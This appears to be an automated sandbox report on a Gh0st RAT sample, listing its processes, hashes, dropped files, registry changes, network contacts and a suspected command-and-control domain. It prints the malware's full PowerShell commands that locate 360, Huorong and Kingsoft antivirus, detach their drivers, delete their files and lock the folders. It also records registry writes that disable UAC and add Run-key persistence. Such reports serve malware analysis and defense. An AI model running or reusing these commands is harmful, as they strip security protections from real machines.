File name:

4.exe

Full analysis: https://app.any.run/tasks/8b7096c9-49e4-42fe-b6e9-6ff8d1972560
Verdict: Malicious activity
Threats:

Gh0st RAT is a malware with advanced trojan functionality that enables attackers to establish full control over the victim’s system. The spying capabilities of Gh0st RAT made it a go-to tool for numerous criminal groups in high-profile attacks against government and corporate organizations. The most common vector of attack involving this malware begins with spam and phishing emails.

Malware Trends Tracker     >>>
Analysis date: December 19, 2024, 08:27:58
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
remote
rat
gh0st
lua
upx
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (GUI) x86-64, for MS Windows, 6 sections
MD5:

3FADBB51B25E6CDBE5602A60479D0B0E

SHA1:

FBB4FF7160BC99FA88339707E2F2F66B459A3538

SHA256:

B3762AFC2A606B2DEC3FA18C9F1E58F7065F2437DDE720176C6608E09E9A767D

SSDEEP:

98304:5DrpK4L00MTSMVr0Xb002l0M2s6jRzvy7KV3rt8nOBl6M8Q/kh5ANftsXJnJnuyF:WJD

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Executing a file with an untrusted certificate

      • 4.exe (PID: 6544)
      • 4.exe (PID: 6636)

    • Connects to the CnC server

      • iusb3mon.exe (PID: 6796)

    • GH0ST has been detected (SURICATA)

      • iusb3mon.exe (PID: 6796)

    • UAC/LUA settings modification

      • iusb3mon.exe (PID: 6796)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 640)
      • powershell.exe (PID: 1488)
      • powershell.exe (PID: 3532)
      • powershell.exe (PID: 7340)
      • powershell.exe (PID: 7360)
      • powershell.exe (PID: 7380)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 640)
      • powershell.exe (PID: 1488)
      • powershell.exe (PID: 7340)
      • powershell.exe (PID: 7360)

    • Changes powershell execution policy (Bypass)

      • iusb3mon.exe (PID: 6796)

    • Uses Task Scheduler to run other applications

      • cmd.exe (PID: 6152)

  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • 4.exe (PID: 6636)
      • irsetup.exe (PID: 6684)

    • Reads security settings of Internet Explorer

      • 4.exe (PID: 6636)
      • ShellExperienceHost.exe (PID: 4244)

    • Reads the date of Windows installation

      • 4.exe (PID: 6636)

    • Hides errors and continues executing the command without stopping

      • powershell.exe (PID: 6820)
      • powershell.exe (PID: 640)
      • powershell.exe (PID: 1488)
      • powershell.exe (PID: 3532)
      • powershell.exe (PID: 6400)
      • powershell.exe (PID: 7340)
      • powershell.exe (PID: 7360)
      • powershell.exe (PID: 7380)
      • powershell.exe (PID: 7740)
      • powershell.exe (PID: 7752)
      • powershell.exe (PID: 4076)

    • Removes files via Powershell

      • powershell.exe (PID: 6820)
      • powershell.exe (PID: 6940)
      • powershell.exe (PID: 6956)
      • powershell.exe (PID: 6948)
      • powershell.exe (PID: 6964)
      • powershell.exe (PID: 640)
      • powershell.exe (PID: 1488)
      • powershell.exe (PID: 3532)
      • powershell.exe (PID: 6400)
      • powershell.exe (PID: 7340)
      • powershell.exe (PID: 7360)
      • powershell.exe (PID: 7740)
      • powershell.exe (PID: 7752)
      • powershell.exe (PID: 7380)
      • powershell.exe (PID: 4076)

    • Renames file via Powershell

      • powershell.exe (PID: 6820)
      • powershell.exe (PID: 640)
      • powershell.exe (PID: 1488)
      • powershell.exe (PID: 3532)
      • powershell.exe (PID: 6400)
      • powershell.exe (PID: 7340)
      • powershell.exe (PID: 7360)
      • powershell.exe (PID: 7740)
      • powershell.exe (PID: 7752)
      • powershell.exe (PID: 7380)
      • powershell.exe (PID: 4076)

    • Starts POWERSHELL.EXE for commands execution

      • irsetup.exe (PID: 6684)
      • iusb3mon.exe (PID: 6796)

    • Suspicious use of asymmetric encryption in PowerShell

      • irsetup.exe (PID: 6684)
      • iusb3mon.exe (PID: 6796)

    • Manipulates environment variables

      • powershell.exe (PID: 6940)
      • powershell.exe (PID: 6948)
      • powershell.exe (PID: 6956)
      • powershell.exe (PID: 6964)

    • Base64-obfuscated command line is found

      • iusb3mon.exe (PID: 6796)

    • The process bypasses the loading of PowerShell profile settings

      • iusb3mon.exe (PID: 6796)

    • Starts CMD.EXE for commands execution

      • iusb3mon.exe (PID: 6796)

    • Creates file in the systems drive root

      • cmd.exe (PID: 7160)
      • iusb3mon.exe (PID: 6796)

    • Contacting a server suspected of hosting an CnC

      • iusb3mon.exe (PID: 6796)

    • Connects to unusual port

      • iusb3mon.exe (PID: 6796)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 6964)

    • Writes data into a file (POWERSHELL)

      • powershell.exe (PID: 6964)

    • Probably obfuscated PowerShell command line is found

      • irsetup.exe (PID: 6684)

  • INFO

    • The sample compiled with english language support

      • 4.exe (PID: 6636)
      • irsetup.exe (PID: 6684)

    • Create files in a temporary directory

      • 4.exe (PID: 6636)
      • SecEdit.exe (PID: 7996)

    • Checks supported languages

      • 4.exe (PID: 6636)
      • irsetup.exe (PID: 6684)
      • iusb3mon.exe (PID: 6796)
      • ShellExperienceHost.exe (PID: 4244)

    • Reads the computer name

      • 4.exe (PID: 6636)
      • irsetup.exe (PID: 6684)
      • iusb3mon.exe (PID: 6796)
      • ShellExperienceHost.exe (PID: 4244)

    • Reads the machine GUID from the registry

      • iusb3mon.exe (PID: 6796)

    • Reads CPU info

      • iusb3mon.exe (PID: 6796)

    • Sends debugging messages

      • iusb3mon.exe (PID: 6796)

    • Creates files in the program directory

      • iusb3mon.exe (PID: 6796)

    • The process uses the downloaded file

      • irsetup.exe (PID: 6684)

    • Process checks computer location settings

      • irsetup.exe (PID: 6684)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7380)
      • powershell.exe (PID: 3532)
      • powershell.exe (PID: 7740)
      • powershell.exe (PID: 4076)
      • powershell.exe (PID: 7752)

    • The process uses Lua

      • irsetup.exe (PID: 6684)

    • UPX packer has been detected

      • iusb3mon.exe (PID: 6796)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.scr | Windows screen saver (76.6)
.exe | Generic Win/DOS Executable (11.7)
.exe | DOS Executable Generic (11.6)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2012:06:14 16:16:12+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 10
CodeSize: 25088
InitializedDataSize: 139264
UninitializedDataSize: -
EntryPoint: 0x2d1c
OSVersion: 5.2
ImageVersion: -
SubsystemVersion: 5.2
Subsystem: Windows GUI
FileVersionNumber: 9.1.0.0
ProductVersionNumber: 9.1.0.0
FileFlagsMask: 0x003f
FileFlags: Private build
FileOS: Windows NT 32-bit
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Windows, Latin1
Comments: Created with Setup Factory
FileDescription: Setup Application
FileVersion: 9.1.0.0
InternalName: suf_launch
LegalCopyright: Setup Engine Copyright © 2004-2012 Indigo Rose Corporation
LegalTrademarks: Setup Factory is a trademark of Indigo Rose Corporation.
OriginalFileName: suf_launch.exe
ProductName: Setup Factory Runtime
ProductVersion: 9.1.0.0
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
178
Monitored processes
48
Malicious processes
9
Suspicious processes
7

Behavior graph

Click at the process to see the details
start 4.exe irsetup.exe #GH0ST iusb3mon.exe powershell.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs shellexperiencehost.exe no specs powershell.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs schtasks.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs secedit.exe no specs secedit.exe no specs secedit.exe no specs secedit.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs 4.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
640powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360°²È«ÎÀÊ¿*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360safe.ini';}C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeiusb3mon.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
640\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1156\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1488powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360sd*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360sd.ini';}C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeiusb3mon.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
1904\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2148\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3060\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3140\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3532powershell.exe -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '»ðÈÞ' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString)} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach sysdiag $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeiusb3mon.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
4076"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '½ðɽ¶¾°Ô' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString.Replace([string][char]34,''))} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach kisknl $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeirsetup.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
Total events
64 488
Read events
64 474
Write events
10
Delete events
4

Modification events

(PID) Process:(6684) irsetup.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:writeName:SlowContextMenuEntries
Value:
6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000
(PID) Process:(6796) iusb3mon.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Operation:writeName:ConsentPromptBehaviorAdmin
Value:
0
(PID) Process:(6796) iusb3mon.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Operation:writeName:EnableLUA
Value:
0
(PID) Process:(6796) iusb3mon.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Operation:writeName:PromptOnSecureDesktop
Value:
0
(PID) Process:(4244) ShellExperienceHost.exeKey:\REGISTRY\A\{97ac789c-5a54-b28d-432c-5c87ef853933}\LocalState
Operation:writeName:PeekBadges
Value:
5B005D00000087783AF5EF51DB01
(PID) Process:(4244) ShellExperienceHost.exeKey:\REGISTRY\A\{97ac789c-5a54-b28d-432c-5c87ef853933}\LocalState
Operation:writeName:PeekBadges
Value:
5B005D0000006B203CF5EF51DB01
(PID) Process:(6796) iusb3mon.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:Microsoft
Value:
C:\ProgramData\Program\iusb3mon.exe
(PID) Process:(6796) iusb3mon.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:Microsoft
Value:
C:\ProgramData\Program\iusb3mon.exe
(PID) Process:(6796) iusb3mon.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:Microsoft
Value:
C:\ProgramData\Program\iusb3mon.exe
(PID) Process:(7996) SecEdit.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SecEdit
Operation:delete valueName:LastWinlogonConfig
Value:
Executable files
3
Suspicious files
10
Text files
42
Unknown types
0

Dropped files

PID
Process
Filename
Type
6820powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_vavusg5y.0sr.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
66364.exeC:\Users\admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeexecutable
MD5:2A7D5F8D3FB4AB753B226FD88D31453B
SHA256:879109AE311E9B88F930CE1C659F29EC0E338687004318661E604D0D3727E3CF
6684irsetup.exeC:\ProgramData\Microsoft\Program\ziliao.jpgbinary
MD5:0DE7701D79971050BE4541C10E236761
SHA256:37435F4C26661850E978AB574A3B20CE42026E7DE614A3A404CAB3872115CCB3
6684irsetup.exeC:\ProgramData\Program\iusb3mon.datcompressed
MD5:7DB8E66EF74C2BA301C9DE02A08AAB79
SHA256:9897994028E66EBA4C5691FE6AB4D9DF527580C8A48F42066E51A82BB6AE2EE9
6684irsetup.exeC:\Users\admin\AppData\Local\Temp\_ir_sf_temp_0\IRIMG2.JPGimage
MD5:AC40DED6736E08664F2D86A65C47EF60
SHA256:F35985FE1E46A767BE7DCEA35F8614E1EDD60C523442E6C2C2397D1E23DBD3EA
6796iusb3mon.exeC:\Users\admin\AppData\Local\Temp\_ir_tu2_temp_0\IRIMG1.JPGimage
MD5:E39405E85E09F64CCDE0F59392317DD3
SHA256:CFD9677E1C0E10B1507F520C4ECD40F68DB78154C0D4E6563403D540F3BF829F
6684irsetup.exeC:\Users\admin\AppData\Local\Temp\_ir_sf_temp_0\IRIMG1.JPGimage
MD5:3220A6AEFB4FC719CC8849F060859169
SHA256:988CF422CBF400D41C48FBE491B425A827A1B70691F483679C1DF02FB9352765
6796iusb3mon.exeC:\Users\admin\AppData\Local\Temp\_ir_tu2_temp_0\IRIMG3.JPGbinary
MD5:9CA19B0ABBD0BBF8C01D835AABE36C0E
SHA256:568BA3C29FFB6BC581602235D46210989831B00689F369B965ABBA061A042C02
6796iusb3mon.exeC:\Users\admin\AppData\Local\Temp\Xlpd 5 Update Log.txttext
MD5:245A37BFC55730894F365C317D82B7C2
SHA256:837276DD383853745F57CA2B70FC67630D3FEC5B6DBD77A255D385AABDF87D35
6684irsetup.exeC:\Users\admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.datbinary
MD5:0C87361D5B609B0D56730DD142EDDFD9
SHA256:D7A04FB3D8FFCDFE6E229436422BF2B1CDDFB8FC78A0345E5C324A9FF1AE5D78
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
34
DNS requests
17
Threats
1

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
23.48.23.156:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5236
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
5236
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
6352
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
whitelisted
6352
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
192.168.100.255:137
whitelisted
51.104.136.2:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
23.48.23.156:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4712
MoUsoCoreWorker.exe
51.104.136.2:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2380
svchost.exe
51.104.136.2:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
1176
svchost.exe
20.190.159.75:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1076
svchost.exe
23.218.210.69:443
go.microsoft.com
AKAMAI-AS
DE
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.185.110
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
crl.microsoft.com
  • 23.48.23.156
  • 23.48.23.143
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
login.live.com
  • 20.190.159.75
  • 40.126.31.67
  • 20.190.159.0
  • 20.190.159.4
  • 40.126.31.73
  • 20.190.159.71
  • 40.126.31.69
  • 20.190.159.73
whitelisted
go.microsoft.com
  • 23.218.210.69
whitelisted
k6.laomaogege.com
  • 134.122.183.243
unknown
settings-win.data.microsoft.com
  • 40.127.240.158
  • 51.124.78.146
whitelisted
slscr.update.microsoft.com
  • 4.175.87.197
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 20.3.187.198
whitelisted

Threats

Found threats are available for the paid subscriptions
1 ETPRO signatures available at the full report
Process
Message
iusb3mon.exe
Thread running...
iusb3mon.exe
Thread running...
iusb3mon.exe
Thread running...
iusb3mon.exe
Thread running...
iusb3mon.exe
Thread running...
iusb3mon.exe
Thread running...
iusb3mon.exe
Thread running...
iusb3mon.exe
Thread running...
iusb3mon.exe
Thread running...
iusb3mon.exe
Thread running...